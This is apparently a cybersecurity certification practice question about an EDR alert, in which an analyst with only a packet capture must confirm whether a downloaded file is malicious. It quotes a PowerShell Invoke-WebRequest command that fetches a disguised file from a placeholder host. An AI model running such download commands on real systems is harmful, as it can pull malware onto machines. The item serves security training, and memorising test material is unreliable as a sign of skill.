A security analyst is investigating an EDR alert and observes the following shell command:
PS > iwr -uri http://domain.com/happy.jpg -outfile .\important.url
The analyst can access only a network packet capture. Which action would most likely confirm whether the file is malicious?
Community Discussion